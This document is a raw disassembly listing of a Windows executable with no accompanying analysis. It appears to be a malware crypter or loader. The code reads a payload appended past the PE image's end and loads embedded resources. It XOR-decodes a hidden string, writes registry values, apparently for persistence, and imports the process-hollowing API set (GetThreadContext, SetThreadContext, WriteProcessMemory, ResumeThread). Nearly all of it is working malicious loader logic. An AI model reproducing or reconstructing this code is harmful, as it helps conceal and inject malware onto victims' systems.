push ebx
mov ebx, eax
xor eax, eax
mov ds:TlsIndex, eax
push 0 ; lpModuleName
call GetModuleHandleA
mov ds:hModule, eax
mov eax, ds:hModule
mov ds:dword_405090, eax
xor eax, eax
mov ds:dword_405094, eax
xor eax, eax
mov ds:dword_405098, eax
call sub_4029DC
mov edx, offset dword_40508C
mov eax, ebx
call sub_401C70
pop ebx
retn
sub_4029E8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A2C proc near ; DATA XREF: CODE:00403F70�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_402A51
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064B0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402A58
loc_402A50: ; CODE XREF: sub_402A2C+2A�j
retn
; ---------------------------------------------------------------------------
loc_402A51: ; DATA XREF: sub_402A2C+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402A50
; ---------------------------------------------------------------------------
loc_402A58: ; CODE XREF: sub_402A2C:loc_402A50�j
; DATA XREF: sub_402A2C+1F�o
pop ebp
retn
sub_402A2C endp
; ---------------------------------------------------------------------------
align 4
loc_402A5C: ; DATA XREF: CODE:off_403F6C�o
sub ds:dword_4064B0, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A64 proc near ; DATA XREF: CODE:00403F80�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_402A89
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064B8
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402A90
loc_402A88: ; CODE XREF: sub_402A64+2A�j
retn
; ---------------------------------------------------------------------------
loc_402A89: ; DATA XREF: sub_402A64+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402A88
; ---------------------------------------------------------------------------
loc_402A90: ; CODE XREF: sub_402A64:loc_402A88�j
; DATA XREF: sub_402A64+1F�o
pop ebp
retn
sub_402A64 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402A94 proc near ; DATA XREF: CODE:00403F7C�o
sub ds:dword_4064B8, 1
retn
sub_402A94 endp
; [00000006 BYTES: COLLAPSED FUNCTION RegCloseKey. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION RegOpenKeyA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION RegSetValueExA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION CloseHandle_0. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION CopyFileA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION CreateFileA_0. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION CreateProcessA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION DeleteFileA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION ExitProcess_0. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION FindResourceA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION FreeResource. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetEnvironmentVariableA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetFileAttributesA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetFileSize_0. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetModuleHandleA_0. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetProcAddress. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION GetThreadContext. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION LoadResource. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION LockResource. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION ReadFile_0. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION ReadProcessMemory. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION ResumeThread. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION SetFilePointer_0. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION SetLastError. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION SetThreadContext. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION SizeofResource. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION Sleep. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION TerminateProcess. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION WriteProcessMemory. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
sub_402B84 proc near ; CODE XREF: sub_403168+6C�p
; CODE:00404047�p
xor ecx, ecx
call sub_4018A8
retn
sub_402B84 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B8C proc near ; DATA XREF: CODE:00403F88�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_402BB1
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064BC
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402BB8
loc_402BB0: ; CODE XREF: sub_402B8C+2A�j
retn
; ---------------------------------------------------------------------------
loc_402BB1: ; DATA XREF: sub_402B8C+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402BB0
; ---------------------------------------------------------------------------
loc_402BB8: ; CODE XREF: sub_402B8C:loc_402BB0�j
; DATA XREF: sub_402B8C+1F�o
pop ebp
retn
sub_402B8C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402BBC proc near ; DATA XREF: CODE:00403F84�o
sub ds:dword_4064BC, 1
retn
sub_402BBC endp
; [00000006 BYTES: COLLAPSED FUNCTION FindExecutableA. PRESS KEYPAD "+" TO EXPAND]
align 4
; [00000006 BYTES: COLLAPSED FUNCTION ShellExecuteA. PRESS KEYPAD "+" TO EXPAND]
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402BD4 proc near ; DATA XREF: CODE:00403F90�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_402BF9
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064C0
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402C00
loc_402BF8: ; CODE XREF: sub_402BD4+2A�j
retn
; ---------------------------------------------------------------------------
loc_402BF9: ; DATA XREF: sub_402BD4+6�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402BF8
; ---------------------------------------------------------------------------
loc_402C00: ; CODE XREF: sub_402BD4:loc_402BF8�j
; DATA XREF: sub_402BD4+1F�o
pop ebp
retn
sub_402BD4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_402C04 proc near ; DATA XREF: CODE:00403F8C�o
sub ds:dword_4064C0, 1
retn
sub_402C04 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C0C proc near ; CODE XREF: CODE:0040477B�p
; CODE:00404799�p ...
hKey = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 00401B94 SIZE 00000036 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push ebx
mov [ebp+var_8], ecx
mov [ebp+var_4], edx
mov ebx, eax
mov eax, [ebp+var_4]
call sub_402048
mov eax, [ebp+var_8]
call sub_402048
mov eax, [ebp+arg_0]
call sub_402048
xor eax, eax
push ebp
push offset loc_402CAA
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+hKey]
push eax ; phkResult
mov eax, [ebp+var_4]
call sub_402058
push eax ; lpSubKey
push ebx ; hKey
call RegOpenKeyA
mov eax, [ebp+arg_0]
call sub_401F04
mov ebx, eax
push ebx ; cbData
lea eax, [ebp+arg_0]
call sub_4020AC
push eax ; lpData
push 1 ; dwType
push 0 ; Reserved
mov eax, [ebp+var_8]
call sub_402058
push eax ; lpValueName
mov eax, [ebp+hKey]
push eax ; hKey
call RegSetValueExA
mov eax, [ebp+hKey]
push eax ; hKey
call RegCloseKey
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402CB1
loc_402C94: ; CODE XREF: sub_402C0C+A3�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_401DE8
lea eax, [ebp+arg_0]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_402CAA: ; DATA XREF: sub_402C0C+2A�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402C94
; ---------------------------------------------------------------------------
loc_402CB1: ; CODE XREF: sub_402C0C+9D�j
; DATA XREF: sub_402C0C+83�o
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_402C0C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_402CB8 proc near ; CODE XREF: CODE:0040445E�p
; CODE:004046BC�p
push ebx
mov ebx, eax
mov eax, ebx
call sub_402058
push eax ; lpFileName
call GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_402CD1
test al, 10h
jnz short loc_402CD5
loc_402CD1: ; CODE XREF: sub_402CB8+13�j
xor eax, eax
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402CD5: ; CODE XREF: sub_402CB8+17�j
mov al, 1
pop ebx
retn
sub_402CB8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402CDC proc near ; CODE XREF: CODE:004042B2�p
var_15C = byte ptr -15Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEA4h
push ebx
push esi
push edi
xor ecx, ecx
mov [ebp+var_8], ecx
mov esi, edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_402E29
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, esi
call sub_401DC4
mov eax, ds:off_4050C4
mov byte ptr [eax], 0
mov edx, [ebp+var_4]
lea eax, [ebp+var_15C]
call sub_4016A4
mov edx, 1
lea eax, [ebp+var_15C]
call sub_4019EC
call sub_401228
lea eax, [ebp+var_15C]
call sub_40185C
call sub_401228
mov [ebp+var_C], eax
cmp [ebp+var_C], 400h
jle short loc_402DCA
loc_402D56: ; CODE XREF: sub_402CDC+EC�j
lea eax, [ebp+var_8]
mov edx, 400h
call sub_402184
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
call sub_4020AC
mov edx, eax
mov ecx, 400h
lea eax, [ebp+var_15C]
call sub_4017A8
call sub_401228
mov eax, esi
mov edx, [ebp+var_8]
call sub_401F0C
mov eax, [ebp+var_10]
sub [ebp+var_C], eax
lea eax, [ebp+var_15C]
call sub_40185C
call sub_401228
mov ecx, 64h
cdq
idiv ecx
mov edi, eax
xor ebx, ebx
jmp short loc_402DB6
; ---------------------------------------------------------------------------
loc_402DB4: ; CODE XREF: sub_402CDC+E3�j
add ebx, edi
loc_402DB6: ; CODE XREF: sub_402CDC+D6�j
mov eax, [esi]
call sub_401F04
cmp ebx, eax
jl short loc_402DB4
cmp [ebp+var_C], 400h
jg short loc_402D56
loc_402DCA: ; CODE XREF: sub_402CDC+78�j
lea eax, [ebp+var_8]
mov edx, [ebp+var_C]
call sub_402184
push 0
lea eax, [ebp+var_8]
call sub_4020AC
mov edx, eax
mov ecx, [ebp+var_C]
lea eax, [ebp+var_15C]
call sub_4017A8
call sub_401228
mov eax, esi
mov edx, [ebp+var_8]
call sub_401F0C
lea eax, [ebp+var_15C]
call sub_4017E8
call sub_401228
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402E30
loc_402E1B: ; CODE XREF: sub_402CDC+152�j
lea eax, [ebp+var_8]
mov edx, 2
call sub_401DE8
retn
; ---------------------------------------------------------------------------
loc_402E29: ; DATA XREF: sub_402CDC+21�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402E1B
; ---------------------------------------------------------------------------
loc_402E30: ; CODE XREF: sub_402CDC+14C�j
; DATA XREF: sub_402CDC+13A�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_402CDC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E38 proc near ; CODE XREF: CODE:004040A8�p
; CODE:004041DD�p ...
var_174 = byte ptr -174h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_14C = byte ptr -14Ch
var_146 = word ptr -146h
Buffer = byte ptr -54h
lDistanceToMove = dword ptr -18h
var_14 = dword ptr -14h
NumberOfBytesRead= dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFE8Ch
push ebx
push esi
push edi
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_402FA2
push dword ptr fs:[eax]
mov fs:[eax], esp
xor ebx, ebx
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
mov eax, [ebp+var_4]
call sub_402058
push eax ; lpFileName
call CreateFileA_0
mov esi, eax
push 0 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
push 0 ; lDistanceToMove
push esi ; hFile
call SetFilePointer_0
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push 40h ; nNumberOfBytesToRead
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push esi ; hFile
call ReadFile_0
cmp [ebp+NumberOfBytesRead], 40h
jnz loc_402F86
push 0 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
mov eax, [ebp+lDistanceToMove]
push eax ; lDistanceToMove
push esi ; hFile
call SetFilePointer_0
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push 0F8h ; nNumberOfBytesToRead
lea eax, [ebp+var_14C]
push eax ; lpBuffer
push esi ; hFile
call ReadFile_0
cmp [ebp+NumberOfBytesRead], 0F8h
jnz loc_402F7E
push 1 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
movzx eax, [ebp+var_146]
dec eax
shl eax, 3
lea eax, [eax+eax*4]
push eax ; lDistanceToMove
push esi ; hFile
call SetFilePointer_0
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push 28h ; nNumberOfBytesToRead
lea eax, [ebp+var_174]
push eax ; lpBuffer
push esi ; hFile
call ReadFile_0
mov eax, [ebp+var_160]
add eax, [ebp+var_164]
mov [ebp+var_14], eax
push 0 ; lpFileSizeHigh
push esi ; hFile
call GetFileSize_0
mov edi, eax
sub edi, [ebp+var_14]
test edi, edi
jbe short loc_402F76
push 0 ; dwMoveMethod
push 0 ; lpDistanceToMoveHigh
mov eax, [ebp+var_14]
push eax ; lDistanceToMove
push esi ; hFile
call SetFilePointer_0
mov eax, edi
call sub_401144
mov edx, [ebp+var_8]
mov [edx], eax
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push edi ; nNumberOfBytesToRead
mov eax, [ebp+var_8]
mov eax, [eax]
push eax ; lpBuffer
push esi ; hFile
call ReadFile_0
cmp edi, [ebp+NumberOfBytesRead]
jnz short loc_402F6E
mov bl, 1
mov eax, [ebp+var_C]
mov [eax], edi
push esi ; hObject
call CloseHandle_0
jmp short loc_402F8C
; ---------------------------------------------------------------------------
loc_402F6E: ; CODE XREF: sub_402E38+125�j
push esi ; hObject
call CloseHandle_0
jmp short loc_402F8C
; ---------------------------------------------------------------------------
loc_402F76: ; CODE XREF: sub_402E38+F3�j
push esi ; hObject
call CloseHandle_0
jmp short loc_402F8C
; ---------------------------------------------------------------------------
loc_402F7E: ; CODE XREF: sub_402E38+A1�j
push esi ; hObject
call CloseHandle_0
jmp short loc_402F8C
; ---------------------------------------------------------------------------
loc_402F86: ; CODE XREF: sub_402E38+6E�j
push esi ; hObject
call CloseHandle_0
loc_402F8C: ; CODE XREF: sub_402E38+134�j
; sub_402E38+13C�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_402FA9
loc_402F99: ; CODE XREF: sub_402E38+16F�j
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_402FA2: ; DATA XREF: sub_402E38+20�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_402F99
; ---------------------------------------------------------------------------
loc_402FA9: ; CODE XREF: sub_402E38+169�j
; DATA XREF: sub_402E38+15C�o
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_402E38 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402FB4 proc near ; CODE XREF: sub_403038+2D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov [ebp+var_8], ecx
mov [ebp+var_4], edx
mov edi, eax
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_403029
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_401F04
mov esi, eax
test esi, esi
jle short loc_403008
mov ebx, 1
loc_402FEE: ; CODE XREF: sub_402FB4+52�j
lea eax, [ebp+var_4]
call sub_4020AC
mov edx, [ebp+var_4]
movzx edx, byte ptr [edx+ebx-1]
xor edx, edi
mov [eax+ebx-1], dl
inc ebx
dec esi
jnz short loc_402FEE
loc_403008: ; CODE XREF: sub_402FB4+33�j
mov eax, [ebp+var_8]
mov edx, [ebp+var_4]
call sub_401E18
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403030
loc_403020: ; CODE XREF: sub_402FB4+7A�j
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_403029: ; DATA XREF: sub_402FB4+1C�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403020
; ---------------------------------------------------------------------------
loc_403030: ; CODE XREF: sub_402FB4+74�j
; DATA XREF: sub_402FB4+67�o
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_402FB4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403038 proc near ; CODE XREF: CODE:004043D7�p
Result = byte ptr -104h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEFCh
push ebx
push esi
xor edx, edx
mov [ebp+var_4], edx
mov esi, eax
xor eax, eax
push ebp
push offset loc_4030DE
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_4]
mov edx, offset aA7qmt ; "a7qmt"
mov eax, 19h
call sub_402FB4
lea eax, [ebp+Result]
xor ecx, ecx
mov edx, 100h
call sub_4018A8
push 0 ; hTemplateFile
push 2 ; dwFlagsAndAttributes
push 2 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 2 ; dwShareMode
push 40000000h ; dwDesiredAccess
mov eax, [ebp+var_4]
call sub_402058
mov ebx, eax
push ebx ; lpFileName
call CreateFileA_0
push eax ; hObject
call CloseHandle_0
lea eax, [ebp+Result]
push eax ; lpResult
push 0 ; lpDirectory
push ebx ; lpFile
call FindExecutableA
push ebx ; lpFileName
call DeleteFileA
mov eax, esi
lea edx, [ebp+Result]
mov ecx, 100h
call sub_401EEC
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4030E5
loc_4030D5: ; CODE XREF: sub_403038+AB�j
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_4030DE: ; DATA XREF: sub_403038+15�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_4030D5
; ---------------------------------------------------------------------------
loc_4030E5: ; CODE XREF: sub_403038+A5�j
; DATA XREF: sub_403038+98�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403038 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 5
aA7qmt db 'a7qmt',0 ; DATA XREF: sub_403038+23�o
align 4
; =============== S U B R O U T I N E =======================================
sub_4030FC proc near ; CODE XREF: CODE:00404211�p
; CODE:00404226�p ...
var_108 = byte ptr -108h
push ebx
push esi
add esp, 0FFFFFEF4h
mov esi, edx
mov ebx, eax
lea edx, [esp+114h+var_108]
mov eax, ebx
call sub_401A74
lea edx, [esp+114h+var_108]
mov eax, esp
mov cl, 0Bh
call sub_401840
mov eax, esi
mov edx, esp
call sub_401EE0
add esp, 10Ch
pop esi
pop ebx
retn
sub_4030FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_403134 proc near ; CODE XREF: sub_403168+B2�p
; sub_403168+F9�p
push ecx
mov edx, esp
call sub_401A80
pop edx
retn
sub_403134 endp
; ---------------------------------------------------------------------------
align 10h
off_403140 dd offset dword_403144 ; DATA XREF: sub_403168+7B�r
; sub_403168+12C�r ...
dword_403144 dd 322E0211h, 4 ; DATA XREF: CODE:off_403140�o
dd offset off_401000
dd 48h
dd offset off_401000
dd 746E750Ch, 636E5F46h, 6E6F6974h, 408D73h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403168 proc near ; CODE XREF: CODE:004040F2�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
xor ecx, ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_403334
push dword ptr fs:[eax]
mov fs:[eax], esp
lea eax, [ebp+var_10]
mov edx, [ebp+var_4]
call sub_401E5C
loc_40319D: ; CODE XREF: sub_403168+60�j
mov edx, [ebp+var_10]
mov eax, offset dword_40334C
call sub_40213C
mov ecx, eax
lea eax, [ebp+var_10]
mov edx, 1
call sub_4020F4
mov edx, [ebp+var_10]
mov eax, offset dword_40334C
call sub_40213C
test eax, eax
jg short loc_40319D
xor edi, edi
lea eax, [ebp+var_C]
mov edx, 4
call sub_402B84
push 1
lea eax, [ebp+var_C]
mov ecx, 1
mov edx, off_403140
call sub_4027E8
add esp, 4
jmp loc_4032C7
; ---------------------------------------------------------------------------
loc_4031F6: ; CODE XREF: sub_403168+16E�j
lea eax, [ebp+var_14]
push eax
mov edx, [ebp+var_10]
mov eax, offset dword_403358
call sub_40213C
mov ecx, eax
dec ecx
mov edx, 1
mov eax, [ebp+var_10]
call sub_4020B4
mov eax, [ebp+var_14]
call sub_403134
mov ebx, eax
mov edx, [ebp+var_10]
mov eax, offset dword_403358
call sub_40213C
mov ecx, eax
lea eax, [ebp+var_10]
mov edx, 1
call sub_4020F4
lea eax, [ebp+var_18]
push eax
mov edx, [ebp+var_10]
mov eax, offset dword_403364
call sub_40213C
mov ecx, eax
dec ecx
mov edx, 1
mov eax, [ebp+var_10]
call sub_4020B4
mov eax, [ebp+var_18]
call sub_403134
mov esi, eax
mov edx, [ebp+var_10]
mov eax, offset dword_403364
call sub_40213C
mov ecx, eax
lea eax, [ebp+var_10]
mov edx, 1
call sub_4020F4
cmp edi, ebx
jg short loc_4032A2
lea edi, [ebx+1]
push edi
lea eax, [ebp+var_C]
mov ecx, 1
mov edx, off_403140
call sub_4027E8
add esp, 4
loc_4032A2: ; CODE XREF: sub_403168+11E�j
mov eax, [ebp+var_C]
lea eax, [eax+ebx*4]
push eax
mov ecx, esi
mov edx, 1
mov eax, [ebp+var_4]
call sub_4020B4
lea eax, [ebp+var_4]
mov ecx, esi
mov edx, 1
call sub_4020F4
loc_4032C7: ; CODE XREF: sub_403168+89�j
mov edx, [ebp+var_10]
mov eax, offset dword_403364
call sub_40213C
test eax, eax
jg loc_4031F6
mov eax, [ebp+var_8]
call sub_401DC4
mov ebx, edi
dec ebx
test ebx, ebx
jl short loc_403303
inc ebx
xor esi, esi
loc_4032EE: ; CODE XREF: sub_403168+199�j
mov eax, [ebp+var_8]
mov edx, [ebp+var_C]
mov edx, [edx+esi*4]
call sub_401F0C
mov eax, [ebp+var_8]
inc esi
dec ebx
jnz short loc_4032EE
loc_403303: ; CODE XREF: sub_403168+181�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40333B
loc_403310: ; CODE XREF: sub_403168+1D1�j
lea eax, [ebp+var_18]
mov edx, 3
call sub_401DE8
lea eax, [ebp+var_C]
mov edx, off_403140
call sub_4027F4
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_403334: ; DATA XREF: sub_403168+1F�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_403310
; ---------------------------------------------------------------------------
loc_40333B: ; CODE XREF: sub_403168+1CB�j
; DATA XREF: sub_403168+1A3�o
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_403168 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 1
dword_40334C dd 1, 0FFFFFFFFh, 1 ; DATA XREF: sub_403168+38�o
; sub_403168+54�o
dword_403358 dd 3Ah, 0FFFFFFFFh, 1 ; DATA XREF: sub_403168+95�o
; sub_403168+BC�o
dword_403364 dd 3Bh ; DATA XREF: sub_403168+DC�o
; sub_403168+103�o ...
; =============== S U B R O U T I N E =======================================
sub_403368 proc near ; CODE XREF: CODE:00404000�p
; CODE:00404059�p ...
push ebx
push esi
mov esi, eax
push 0Ah ; lpType
push edx ; lpName
mov eax, ds:hModule
push eax ; hModule
call FindResourceA
mov ebx, eax
push ebx ; hResInfo
mov eax, ds:hModule
push eax ; hModule
call SizeofResource
mov [esi], eax
push ebx ; hResInfo
mov eax, ds:hModule
push eax ; hModule
call LoadResource
mov ebx, eax
push ebx ; hResData
call LockResource
mov esi, eax
test esi, esi
jz short loc_4033AA
push ebx ; hResData
call FreeResource
loc_4033AA: ; CODE XREF: sub_403368+3A�j
mov eax, esi
pop esi
pop ebx
retn
sub_403368 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4033B0 proc near ; CODE XREF: CODE:004041F7�p
; CODE:0040442A�p ...
Buffer = byte ptr -109h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFEF4h
push ebx
push esi
mov esi, edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_402048
xor eax, eax
push ebp
push offset loc_403438
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, esi
call sub_401DC4
lea eax, [ebp+Buffer]
xor ecx, ecx
mov edx, 104h
call sub_4018A8
mov ebx, 104h
push ebx ; nSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
mov eax, [ebp+var_4]
call sub_402058
push eax ; lpName
call GetEnvironmentVariableA
mov ebx, eax
test ebx, ebx
jbe short loc_403422
mov eax, esi
lea edx, [ebp+Buffer]
mov ecx, 105h
call sub_401EEC
loc_403422: ; CODE XREF: sub_4033B0+5E�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40343F
loc_40342F: ; CODE XREF: sub_4033B0+8D�j
lea eax, [ebp+var_4]
call sub_401DC4
retn
; ---------------------------------------------------------------------------
loc_403438: ; DATA XREF: sub_4033B0+1B�o
jmp loc_401B94
; ---------------------------------------------------------------------------
jmp short loc_40342F
; ---------------------------------------------------------------------------
loc_40343F: ; CODE XREF: sub_4033B0+87�j
; DATA XREF: sub_4033B0+7A�o
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4033B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403448 proc near ; DATA XREF: CODE:00403F98�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_40346D
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_4064C4
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_403474
